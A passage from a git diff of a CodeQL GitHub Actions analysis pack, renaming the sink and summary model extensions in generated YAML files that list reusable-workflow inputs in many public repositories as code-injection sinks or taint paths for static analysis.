["dagger/dagger/.github/workflows/_hack_make.yml", "*", "input.mage-targets", "code-injection", "generated"] - ["dagger/dagger/.github/workflows/_hack_make.yml", "*", "input.dev-engine", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml b/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml index f5ce50243f7..18e66bf7291 100644 --- a/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dash-industry-forum/dash.js/.github/workflows/deploy.yml", "*", "input.deploy_path", "code-injection", "generated"] - ["dash-industry-forum/dash.js/.github/workflows/deploy.yml", "*", "input.envname", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml index 58c30f3cd02..1ed7561a533 100644 --- a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["datadog/dd-trace-go/.github/workflows/smoke-tests.yml", "*", "input.go-libddwaf-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml index d6c0ced50a6..738fde2cb86 100644 --- a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["datadog/dd-trace-py/.github/workflows/lib-inject-publish.yml", "*", "input.ddtrace-version", "code-injection", "generated"] - ["datadog/dd-trace-py/.github/workflows/build-and-publish-image.yml", "*", "input.context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml b/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml index fdcb8775dad..c61a63f1144 100644 
--- a/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["datafuselabs/databend/.github/workflows/reuse.benchmark.yml", "*", "input.run_id", "code-injection", "generated"] - ["datafuselabs/databend/.github/workflows/reuse.benchmark.yml", "*", "input.source_id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml index 66889d2cf42..fef036f4f29 100644 --- a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.s3_bucket_name", "code-injection", "generated"] - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.build_script_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml index e5c5cfeabd3..b13ba8bc40f 100644 --- a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "input.nightly_release", "code-injection", "generated"] - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "input.test_run", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml index 4dc3fc2bc98..3fb2fefff6b 100644 --- a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.s3_bucket_name", "code-injection", "generated"] - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.build_script_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml b/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml index 52c4b4c7a24..4344e254be0 100644 --- a/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["decidim/decidim/.github/workflows/test_app.yml", "*", "input.test_command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml b/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml index 038f92a5317..2a7c5feafea 100644 --- a/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["defectdojo/django-defectdojo/.github/workflows/release-x-manual-helm-chart.yml", "*", "input.release_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml b/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml index 6fab83acf59..9ccb41c3a8c 100644 --- a/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dependencytrack/dependency-track/.github/workflows/_meta-build.yaml", "*", "input.app-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml b/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml index 238856cc7b9..b71e6c001d0 100644 --- a/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["devexpress/testcafe/.github/workflows/test-server.yml", "*", "input.test-script", "code-injection", "generated"] - ["devexpress/testcafe/.github/workflows/test-functional.yml", "*", "input.test-script", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml b/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml index 71b584f5427..ff0695c0ef2 100644 --- a/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dfhack/dfhack/.github/workflows/build-windows.yml", "*", "input.artifact-name", "code-injection", "generated"] - ["dfhack/dfhack/.github/workflows/build-windows.yml", "*", "input.append-date-and-hash", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml b/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml index 1aa15482887..9576ce3892a 100644 --- a/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["docker/build-push-action/.github/workflows/.e2e-run.yml", "*", "input.id", "code-injection", "generated"] - ["docker/build-push-action/.github/workflows/.e2e-run.yml", "*", "input.type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml b/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml index 89dd705f590..b78d6118411 100644 --- a/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dragonwell-project/dragonwell11/.github/workflows/test.yml", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml b/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml index eb57c708bf5..cbe56806056 100644 --- a/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "input.BINARY", "code-injection", "generated"] - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "input.SUDO", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml index 048a753c553..391bbc6aacb 100644 --- a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["eclipse-vertx/vert.x/.github/workflows/ci.yml", "*", "input.profile", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml index 739f6a546b2..f8b490726da 100644 --- a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["eclipse-vertx/vertx-sql-client/.github/workflows/ci.yml", "*", "input.profile", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml b/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml index f6c2769caaf..889499eea3d 100644 --- a/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["elastic/elasticsearch-net/.github/workflows/release.yml", "*", "input.solution", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml b/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml index 4d104c74c66..2dce19050ed 100644 --- a/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["element-hq/element-desktop/.github/workflows/build_windows.yaml", "*", "input.version", "code-injection", "generated"] - ["element-hq/element-desktop/.github/workflows/build_prepare.yaml", "*", "input.config", "code-injection", "generated"] @@ -11,6 +11,6 @@ extensions: - ["element-hq/element-desktop/.github/workflows/build_linux.yaml", "*", "input.version", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["element-hq/element-desktop/.github/workflows/build_prepare.yaml", "*", "input.deploy", "output.deploy", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml b/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml index 2a9e2f9fd1a..c80f8e732b6 100644 
--- a/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["envoyproxy/envoy/.github/workflows/_load.yml", "*", "input.run-id", "output.run-id", "taint", "manual"] - ["envoyproxy/envoy/.github/workflows/_load.yml", "*", "input.check-name", "output.check-name", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml b/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml index 9f56abf2858..b85a11d81f2 100644 --- a/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["etcd-io/bbolt/.github/workflows/robustness_template.yaml", "*", "input.testTimeout", "code-injection", "generated"] - ["etcd-io/bbolt/.github/workflows/robustness_template.yaml", "*", "input.count", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml b/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml index 8c73342d5fe..f8102400cc7 100644 --- a/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["etcd-io/etcd/.github/workflows/tests-template.yaml", "*", "input.arch", "code-injection", "generated"] - ["etcd-io/etcd/.github/workflows/robustness-template.yaml", "*", "input.scenario", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml b/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml index 87253d88224..1af7b832203 100644 --- a/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["eventstore/eventstore/.github/workflows/build-reusable.yml", "*", "input.arch", "code-injection", "generated"] - ["eventstore/eventstore/.github/workflows/build-container-reusable.yml", "*", "input.container-runtime", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml b/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml index 9eb4c17cd3a..c0688a4a5e0 100644 --- a/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["expensify/app/.github/workflows/e2ePerformanceTests.yml", "*", "input.PR_NUMBER", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml b/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml index 860dcdcb43d..4e91308a004 100644 --- a/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["external-secrets/external-secrets/.github/workflows/publish.yml", "*", "input.image-tag", "code-injection", "generated"] - ["external-secrets/external-secrets/.github/workflows/publish.yml", "*", "input.tag-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml b/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml index 539edcd5891..bc42c619599 100644 --- a/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["facebook/create-react-app/.github/workflows/e2e-base.yml", "*", "input.testScript", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml b/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml index b1b37d967e9..68925b294bb 100644 --- a/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "input.aws_s3_cp_extra_args", "code-injection", "generated"] - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "input.s3_path", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml b/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml index 51691edc1f9..c3ff42ed604 100644 --- a/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["falcosecurity/falco/.github/workflows/reusable_build_packages.yaml", "*", "input.build_type", "code-injection", "generated"] - ["falcosecurity/falco/.github/workflows/reusable_build_packages.yaml", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml b/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml index 3a14f6a879d..964436f33ca 100644 --- a/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["fastify/fastify/.github/workflows/citgm-package.yml", "*", "input.package", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml b/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml index c7f84e83db5..995940550e1 100644 --- a/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ferretdb/ferretdb/.github/workflows/_integration.yml", "*", "input.task", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml b/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml index 72383be71ca..93653f07819 100644 --- a/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["filecoin-project/venus/.github/workflows/common_go.yml", "*", "input.test_timeout", "code-injection", "generated"] - ["filecoin-project/venus/.github/workflows/common_go.yml", "*", "input.log_level", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml b/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml index 8b05adf053e..961070778cf 100644 --- a/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "input.triggered_by_callable", "code-injection", "generated"] - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "input.package_version_number", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml b/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml index 9eec959ade3..9f1cc82523c 100644 --- a/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["flarum/framework/.github/workflows/REUSABLE_backend.yml", "*", "input.monorepo_tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml b/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml index 835301ecc73..68babc09b6a 100644 --- a/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["fluent/fluent-bit/.github/workflows/call-windows-unit-tests.yaml", "*", "input.unstable", "code-injection", "generated"] - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.the_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml b/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml index 9a99588239e..f4271e5424b 100644 --- a/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["flux-iac/tofu-controller/.github/workflows/targeted-test.yaml", "*", "input.pattern", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml b/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml index 12c370b33ad..f20f7997d3c 100644 --- a/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["flyteorg/flyte/.github/workflows/publish.yml", "*", "input.before-build", "code-injection", "generated"] - ["flyteorg/flyte/.github/workflows/integration.yml", "*", "input.component", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml b/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml index 0e03216fc69..da5617fd144 100644 --- a/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "input.org", "code-injection", "generated"] - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "input.solution", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml b/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml index 081378c9617..78821b4dad3 100644 --- a/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["freecad/freecad/.github/workflows/sub_wrapup.yml", "*", "input.previousSteps", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml b/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml index fcd9c292901..f0c9290ca22 100644 
--- a/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "input.output-path", "code-injection", "generated"] - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "input.settings", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml b/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml index 19822c29fcd..21d23698931 100644 --- a/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["getporter/porter/.github/workflows/build_pipelinesrelease_template.yml", "*", "input.registry", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml index d0ccde698b1..ac38cac602d 100644 --- a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["getsentry/sentry-dart/.github/workflows/analyze.yml", "*", "input.panaThreshold", "code-injection", "generated"] - ["getsentry/sentry-dart/.github/workflows/analyze.yml", "*", "input.sdk", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml index 027da83e922..a9f87db955e 100644 --- a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["getsentry/sentry-unity/.github/workflows/sdk.yml", "*", "input.target", "code-injection", "generated"] - ["getsentry/sentry-unity/.github/workflows/android-smoke-test.yml", "*", "input.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml b/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml index a914aa631c3..99c706b0c28 100644 --- a/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gitpod-io/gitpod/.github/workflows/jetbrains-auto-update-template.yml", "*", "input.productId", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml b/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml index d0fe6b0eff5..f8d0172d684 100644 --- a/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml 
